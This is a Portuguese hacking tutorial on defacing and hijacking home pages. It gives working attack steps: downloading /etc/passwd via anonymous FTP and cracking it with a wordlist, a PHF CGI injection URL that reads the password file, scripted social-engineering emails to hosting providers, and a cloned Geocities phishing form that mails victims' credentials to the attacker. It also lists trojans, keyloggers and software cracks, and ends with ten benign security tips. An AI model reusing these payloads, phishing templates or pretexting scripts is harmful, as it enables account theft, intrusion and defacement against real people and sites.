você tinha sem se preocupar tanto com a sua
segurança
1-PRECAUÇÕES:
Nessa tutorial você vai aprender como hackear uma home
page. Queria avisar que hackear uma home page é
considerado crime e que isso dá cadeia.Também
NÃO DESTRUA uma HP completamente, os grupos hackers
mais conhecidos mundialmente, geralmente, hackeiam apenas a
página inicial colocando banners, estragando links,
enfim deixando sua marca...isso faz parte da ética.
Portanto não avacalhe!!!(pelo menos não
tanto!)
Toda
vez que você entra em um sistema seu IP fica gravado e
"eles" vão poder te encontrar. Portanto antes de
cometer um ato como esse eu sugerimos que vocês tomem
umas medidas de segurança como spoofing e
etc...
2-SOBRE
AS SENHAS: A senha está em um arquivo chamado passwd.
Esse arquivo está normalmente em um diretório
chamado etc/passwd. Então vamos falar um pouco sobre
o passwd. Quando você pega o arquivo passwd, a senha
pode vir encryptada ou então com shadow! A
diferença é que a senha encryptada é a
própria senha só que esta encryptada e a senha
com shadow faz com que a senha fique escondida em outro
lugar! Ou seja, não vai estar no passwd, vai estar em
outro diretório. Para obter a senha escrita
você vai ter que desencripta-la! As senhas com shadow
são impossíveis de "desencryptar"! (levando em
conta que você não tem unix). Uma senha
encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Agora
o exemplo de uma senha com shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail
daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network
Admin:/usr/net/nls:
nobody:x:60001:60001:uid
no body:/:
noaccess:x:60002:60002:uid
no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous
FTP:/export/home/anon_ftp:/bin/false
Você
pode notar que tem um "x" no root! Esse x pode ser
representado também por um "*". Agora você
já sabe um pouco mais sobre o arquivo passwd e sobre
as senhas.
3-DESENCRYPTANDO:
Para desencryptar uma senha precisaremos de três
arquivos básicos. Uma word list, um desencryptador
(recomendo o crackerjack/jack 14)e logicamente o arquivo
onde está senha(passwd).
O
que é cada um? Word list- Como o próprio nome
já diz, é uma lista de palavras.
Desencryptador- É o programa que você vai usar
para desencryptar a senha. Passwd- Nesse arquivo está
a senha encryptada.
Coloque todos esses itens nesse mesmo diretório. Abra
o prompt do DOS e entre no diretório onde eles
estão.
Agora
faça o seguinte, digite : "nome do programa
desencryptador" "nome do arquivo onde esta a senha" "nome da
sua word list" Então vamos supor que meu programa
é o jack, o arquivo é o passwd, a word list
é lista. Então ficaria assim : jack passwd
lista.txt
E
pronto! A senha está desencryptada! Mas como isso
funciona?? Quando você roda o jack ele pega o arquivo
passwd e testa com todas as palavras da word
list.
4-FTP
:Hackear uma HP por ftp talvez seja o melhor metodo.
É bem simples e rápido de ser feito. Para
fazer isso vamos usar o prompt do MS-DOS. Espero que
você saiba pelo menos mexer no básico do
DOS.
O que vamos fazer é simplesmente entrar no ftp da
home page com login anonymous e fazer o download do arquivo
passwd. Abra o prompt do DOS. Você vai ter que entrar
no ftp da HP que voce quer hackear. Normalmente a
endereço é o mesmo da home page. Então
digite ftp www.hackers.com Ele vai pedir seu
USER.
Coloque
anonymous. Agora vai pedir que você coloque seu e-mail
completo como senha. Claro que você vai colocar alguma
coisa qualquer, tipo seila@inventeum.com. Você vai
entrar no ftp como user anonymous e retrictions applly! Isso
significa que você entrou como anonymous e com
restrições aplicadas! Agora você precisa
ir para o diretório etc. Entre e faça o
donwload do passwd. Pra isso digite "get passwd".
Pronto,
o arquivo passwd vai estar no diretório que
você estava quando entrou no ftp. Tipo windows,
arquivos de programas.... Agora você que tem o arquivo
só precisa desencryptalo e pronto! A senha
estará em suas mãos..
5-PHF:
O phf é com certeza o modo mais simples de se obter o
arquivo passwd. É tão simples que você
não precisa saber nada! A única coisa que
você tem que fazer é abrir seu browser e
colocar uma URL. Mas esse método tem 0,5% de chances
de funcionar! O Bug já foi consertado pela maioria
dos servidores. Só colocar essa URL no location do
seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Só isso e tchau!!!
6-HACKEANDO
SERVIDORES DE HOME PAGES GRATIS (1): Alguns servidores de
home page tipo a geocities, tripod e a angelfire, dão
espaço para pessoas colocarem suas home pages no ar.
Há um modo bem simples de se obter a senha de home
pages que estão nesses servidores. Tudo que voce tem
que fazer é mandar um e-mail pedindo pra eles te
mandarem a senha da home page. Mas não mande um
e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente. Pegue todas as
informações da HP possíveis. Do tipo :
"Mês passado eu me cadastrei no serviço de
vocês e recebi uma senha e um user name e meu
endereço "endereço da HP do cara". Eu coloquei
algumas coisas no meu espaço e saí de
férias. Quando voltei das ferias eu tinha me
esquecido da senha!! Só me lembrava do user name, que
é : "user name da HP". Fiquei um bom tempo de ferias
e não pude pagar o provedor, por isso estou com um
e-mail diferente do que consta no cadastro de vocês. O
meu antigo e-mail era esse "mail do webmaster da HP" Por
favor preciso que vocês me mandem um e-mail para "seu
e-mail". Porque eu não tenho o backup dos arquivos
que coloquei lá e não gostaria de perde-los.
Obrigado pela atenção. Espero que voces mandem
a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra
ficar verificando se é verdade eu não!
Provavelmente eles iram acreditar e em 2 semanas(mais ou
menos) você receberá a senha no seu
e-mail!
7-
HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de
hackear esse tipo de home pages é enganar o
próprio webmaster da HP! Esse modo funciona
normalmente com webmasters inexperientes que não
sabem muita coisa e nem percebem que eles mesmos
estão dando a senha para o hackeador. É outro
método bem simples mas um pouco mais demorado. O que
você tem que fazer é criar uma pagina onde
você finge que é a geocities que está
dando mais megas para HP's! Ou seja, você terá
que criar uma página imitando a geocities!
Faça uma pagina exatamente no estilo da da geo. E
coloque tudo com as mesmas gifs, mesmos banners e coloque um
formulário pra ser preenchido e diga que quem
preencher aquilo vai ganhas mais 10 megas livre de
espaço pra HP!!! Nesse formulário o cara
terá que colocar o user e a senha da HP, o
endereço e tal... Para o cara "receber" os megas ele
terá que enviar o formulário. Para isso ele
deverá clicar em algum botão de envio,
normalmente um botão que fica escrito "submit" Quando
a pessoa clica no botão submit formulário
é enviado para a geocities pois aquele botão
tem um comando para enviar para a geocities. Então o
que você terá que fazer é mudar o
comando. Em vez do formulário ser enviado para a
geocities esse formulário vai ser enviado para o seu
e-mail.
Para
isso você terá que editar a pagina da
geocities.
No
lugar que tem escrito:
<form
action="/cgi-bin/homestead/file_manager"method=post>
Você
tará que trocar para :
<FORM
ACTION="http://www.uky.edu/cgi-bin/cgiwrap/~johnr/AnyForm.cgi"METHOD="Post">
<INPUT
TYPE="Hidden" Name="AnyFormMode" Value="mail">
<INPUT
TYPE="Hidden" Name="AnyFormDisplay"
Value="http://www.geocities.com/members/tools/file_manager.html">
<INPUT
TYPE="Hidden" Name="AnyFormTo" Value="Coloque seu e-mail
aqui">
<INPUT
TYPE="Hidden" Name="AnyFormSubject" Value="Senha hackeada da
geocities">
Então
assim que o cara clicar no botão submit todos os
dados serão enviados para o seu e-mail. E assim
você terá a senha. Agora é só
pegar um endereço na net e colocar essa pagina
editada na geocities nele e mandar as pessoas visitarem. E
pronto! O formulário vai chegar com a senha e user
name no teu e-mail.
Há
uma técnica parecida com essa mais é muito
mais complicada. Pra isso você vai precisar de um
servidor pessoal e terá que mudar algumas
configurações em TCP/IP. Pra isso abra o
painel de controle e entre no ícone redes. Agora
entre nas propriedades de TCP/IP. Entre na
configuração DNS. Selecione ativar DNS. Agora
escreva no HOST-->WWW.GEOClTIES(repare que geocities
está escrito com "l" e não um "i")
Então escreva no dominio-->COM. Agora dê OK
em tudo. Vai pedir que você reinicie o micro. Pode
reiniciar. Siga o mesmo procedimento do formulário e
da pagina da geocities da explicação anterior.
Salve essa pagina e coloque-a no diretório de paginas
do seu servidor. Então voce cria um diretório
chamado "members", entra nesse diretório e crie um
diretório chamado "tools". Coloque tudo da page
editada nesse diretório. Coloque seu servidor pra
funcionar e mande o cara entrar em :
HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html
O
endereço tem que ser esse. Se a pessoa entrar no file
manager da geocities isso não vai funcionar(Claro!!!)
Quando o cara colocar os dados dele lá e enviar
estará tudo no teu mail!
Queria
avisar que esses metodos também funcionam com a
angelfire e com a tripod. A geocities foi usada como
exemplo.
8-HACKEANDO
UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO
SERVIDOR : Esse método é realmente
difícil de funcionar mas as vezes funciona com uns
admins bem desinformados. Quando você entra no seu ftp
você pode sair do seu diretório home (diretorio
onde você esta assim que entra) e voltar alguns
diretórios até encontrar o diretório da
HP que você quer hackear. Uma vez que voce já
fez, se você puder ter acesso aos arquivos HTML
pegue-os e edite eles! E pronto! Com admins mais
inteligentes você não consegue ter acesso aos
arquivos da page alvo.
Alguns
programas utilizados para ataque
Trojans
Scanners
|
IP
Query
|
Rastreia
seu próprio IP.
|
|
ChatBuster
|
Rastreia
IPs em salas de chat
|
|
IP
Tracer
|
Rastreia
IPs em salas de chat. Não funciona no UOL
depois do filtro
|
|
IPscan
|
Rastreia
as portas abertas de um certo IP
|
|
Sniffer
|
Serve
para achar o host e tem algumas outras
funções também
|
|
Portscanner
|
Também
serve pra restrear portas abertas
|
|
Xitami
|
Um
dos melhores rastreadores de IP
|
|
Bitchin
Threads 3.1
|
Scanner
que já vem com alguns trojans configurados
para o rastreamento
|
|
Extracrash
1
|
Rastreia
IPs infectados com Wincrash 1.03 no IRC
|
|
Extracrash
2
|
Mesmo
que acima mas para o Wincrash 2.0
|
|
Fire
Fox
|
Scaneia
IPs infectados com o subseven no IRC
|
|
Netscan
3.2
|
Excelente
rastreador de IPs infectados. Muitos
trojans
|
|
Scan
de Troie
|
Rastreia
30 trojans em um único IP
|
|
Trojan
Hunter
|
Scaneia
o Netbus, BO, Wincrash 1.03, Wincrash
2.0
|
|
Trojan
Hunter 1.0
|
Mesmo
que acima mas configurado para mais
trojans
|
|
Trojan
Hunter 1.5
|
Aqui
já vem com 80 trojans. Vale a
pena.
|
|
Tox-Scan
|
Scaneia
IPs infectados com BO e Netbus no IRC
|
|
Wingate
Scan 3
|
Scaneador
de portas que detecta o Wingate 3.0
|
Crackerz
- Decodificadores - E-mail bomb
|
BAT2EXEC
Este programa cria arquivo COM a partir de um
arquivo de lote (BAT)... Muito bom... Alias,
Ótimo!
|
|
|
Key
Gen
|
Gerador
de Keys para produtos Microsoft, como: Office e
etc.
|
|
Kit
Nag Buster
|
Este
kit "quebra" passwords seriais de vários
programa e jogos.
|
|
WiNZip
REG#MAKER
|
Esse
programa registra o WinZip, você digita o seu
nome e ele tá dá o Serial Number
dele.
|
|
Break
ARJ
|
Prog
capaz de "quebrar" passwords de arquivo com
extensão ARJ.
|
|
Break
ZIP
|
Outro
programa que "quebra" passwords de arquivos
zipados.
|
|
Fast
ZIP Cracker
|
Este
programa "quebra" passwords de arquivos zipados,
você pode escolher os métodos de
"Descobrir o password" para o Fast ZIP
executar.
|
|
Cracking
Data
|
O
mesmo que o Date Cracker faz, só que bem
mais fácil de utilizar e bem mais
rápido de se executar... feito em 32 bits
(vb5)... assim, precisa da DLL msvbvm50.dll para
poder roda-lo! verifique se ela está no
system... se não tiver procura ela por
aí... Ah, o Cracking Data, mais
especificamente, muda a data do PC antes de
executar um determinado programa e logo depois
restaura a data original, fazendo assim com que o
programa pense que ainda está naquele tal
dia e assim será infinitamente utilizado,
sem mostrar com aquela mensagem de
expirado!
|
|
Date
Cracker
|
Com
esse programa você pode usar por quanto tempo
quiser aqueles sharewares, como: Paint Shop Pro,
Ultra Edit e outros... ÓTIMO.
|
|
EXESCAN
|
Este
programa escaneia arquivos EXE e mostra
várias informações sobre eles,
desde em que programa foram feitos, se foram
comprimidos, quem comprimiu, etc, etc...
|
|
eXeScope
|
Este
programa serve pra você editar programas. N
ão precisa Descompilar nem nada, ele meche
direto no EXE mesmo... Muito simples de mexer,
você pode por exemplo mudar todas as string
de um programa, poderá mudar imagens,
poderá mudar as propriedades de objetos,
adicionar menus... etc
|
|
John
para Win
|
Este
programa é o melhor desencriptador que
já vimos, do mesmo estilo do Fbrute,
só que com mais opções ele
desencripta senhas do NT, Linux, Unix e outros...
baseado em uma lista de senha e tem outro
métodos também... muito bom! Para
colocar as senhas do NT num arquivo para ser
desenciptada use o Samdump!
|
|
W32Dasm
|
Este
programa é dos melhores Disassemblers que
existe atualmente (03/10/99), se você sabe de
programação com certeza tem que ter
ele no seu computador, ele consegue Descompilar um
programa, dll, ocx, etc... e ainda divide tudo
bonitinho, em funções exportadas,
importadas... muito bom mesmo, e ainda tem um debug
que monitora qualquer programa e pega até as
APIS que o programa chama!! ótimo mesmo! mas
é quase obrigatório saber um pouco de
assembler! Este já está crackeado e
dá pra usar todos os recursos
dele!
|
|
Ultra
Edit
|
Este
é o melhor editor Hexadecimal e normal para
windows, lógico que ele não tem
aquelas funções que o Word tem, o
UltraEdit é mais para quem precisa fazer
coisas rápidas e fáceis rapidamente,
ele abre qualquer arquivo de qualquer tamanho, e na
instalação você escolhe se quer
colocar o menu no botão direito do mouse
para qualquer arquivo, aí vai ter o ultra
edit quando você clicar com o botão
direito. Ah, o arquivo de registro dele está
indo junto no arquivo zipado, jogue o
"ultraedt.reg" no diretório que você
instalou o ultraedit...
|
|
Web
Cracker 2.0
|
Esse
programa explora um buraco bastante grande em
sistemas locais de autenticação de
métodos. Contra-senhas que protegem websites
podem ser facilmente cortadas, dando total acesso
ao site hackeado.
|
|
Web
Cracker 3.0
|
Nova
versão, com uma melhor interface
|
|
Gammaprog
|
Gammaprog
é um programa que tem a função
de Hackear servidores de e-mail, atualmente ele
só funciona no hotmail.com ou da usa.net,
esse programa e escrito em java, portanto ele
só irá rodar com micros equipados com
compiladores de Java, não é
porém um applet, ele não irá
rodar em seu Browser, você pode adquirir um
compilador de Java em: http://www.javasoft.com/products/index.html
|
|
Xitami
|
O
melhor rastreador de ip
|
|
IpTracer
|
Rastreia
ip em salas de chat, não funciona mais no
uol depois do novo filtro
|
|
Chat
Buster
|
Rastreia
ips em salas de chat
|
|
Portscanner
|
Rastreia
as portas abertas da vitima
|
|
Sniffer
|
Rastreia
as portas abertas da vitima
|
|
Winspoof
97
|
Spoofea
seu Ip
|
|
keylog
95
|
Grava
tudo o que é digitado em um arquivo
.doc
|
10
dicas essenciais para ficar seguro na internet
1-
Utilize uma boa política de senhas: É preciso
ter um cuidado especial com sua senha, é
recomendável que ela tenha de 6 a 8 caracteres e
contenham números e letras, o que dificulta a
decriptação ou até mesmo um ataque de
força bruta, ou seja quando o cracker tenta
várias vezes até acertar. Senhas nunca devem
ser anotadas, devem ser memorizadas...
2-
Feche as portas que não estão sendo
utilizadas: Vários serviços podem ser
acessados via Internet. Sê você não
necessita de algum deles, feche-os. Cada serviço
aberto é uma oportunidade a mais para um invasor,
ainda mais se estes programas estiverem
desatualizados.
3-
Atualize as versões dos programas: Um grande erro
cometido por muitos administradores é o de não
dar a devida atenção à versões
de programas instalados. Isso porque programas atualizados
possuem mais recursos que podem dificultar o ataque aos
mesmos.
4-
Registre tudo o que acontece: Por mais segurança que
você implemente, é importante saber se
alguém está tentando atacar seu computador.
Este trabalho é feito através dos chamados
logs, que nada mais são do que registros de tudo o
que acontece em uma estação ou servidor. Se
você tiver um sistema de logs eficiente, fica
fácil descobrir o IP de um possível
invasor.
5-
Utilize ferramentas de análise de logs: Não
basta apenas registrar os logs se você não
souber como analisa-los. Isso pode ser feito usando scripts
simples, criados em Shell ou na linguagem awk. Porém,
se você não pretende criar sua própria
ferramenta, pode utilizar alguns programas prontos. A
função destes softwares é a de realizar
um trabalho de análise e, dependendo das
configurações, enviar um e-mail para o
administrador informando quais alterações que
ocorreram nos logs.
6-
Proteja dados em trânsito: Uma característica
das conexões é transportar os dados sem
encripitação, chamados textos planos (plain
texts). Esta característica está presente no
Telnet e POP3. Uma alternativa para inibir este tipo de
ataque a arquivos públicos, é o uso de
conexões encripitadas, que podem ser realizadas
utilizando o SSH (Secure Shell).
7-
Tenha um bom firewall: Mesmo que você não tenha
outras máquinas em rede, a utilização
de um firewall pessoal é recomendável.
Primeiro porque ele filtra o acesso á portas
não autorizadas a sua máquina. Segundo porque
ele pode ser personalizado de acordo com suas
necessidades.
8-
Instale um bom scenner de portas TCP/UDP: Da mesma forma que
um invasor pode usar um portscanner para detectar falhas de
segurança no seu Linux, você também
pode. Existem várias técnicas para fazer isso,
inclusive algumas nativas do próprio sistema
operacional. Porém, a melhor delas é
utilizando um scanner, como o nmap (network
mapper).
9-
Mantenha-se informado: Todas essas medidas são
realmente eficientes, mas perdem efeito se não houver
uma continuidade no processo. Para manter uma máquina
protegida você precisa ter em mente que a
segurança não é um produto, mas sim um
extensivo processo que deve estar sempre atualizado e
monitorado.
10-
Prepare armadilhas: Alguns invasores utilizam programas
chamados scanners para determinar quais portas estão
abertas no sistema. Com estas informações em
mãos, eles verificam qual a versão de cada
programa e quais as vulnerabilidades disponíveis.
Sendo assim, preparar armadilhas pode ser útil
até para identificar possíveis
ataques.
Não
se esqueça de consultar o manual de referencia do seu
programa para saber o arquivo á alterar. Mudar
configurações de programas sem a certeza do
que está sendo feito pode colocar em risco o bom
funcionamento de seu sistema.
Bibliografia
Emperor
Hacker Page
Bernstein,Terry.
Segurança na Internet. Rio de Janeiro:
Campus
Na
mira da lei &emdash; Internet.Br ano 4 n. 48 pag 42 à
50
PC
Máster &emdash; Especial Hackers Ano 4 n. 5
pág 28 à 40
|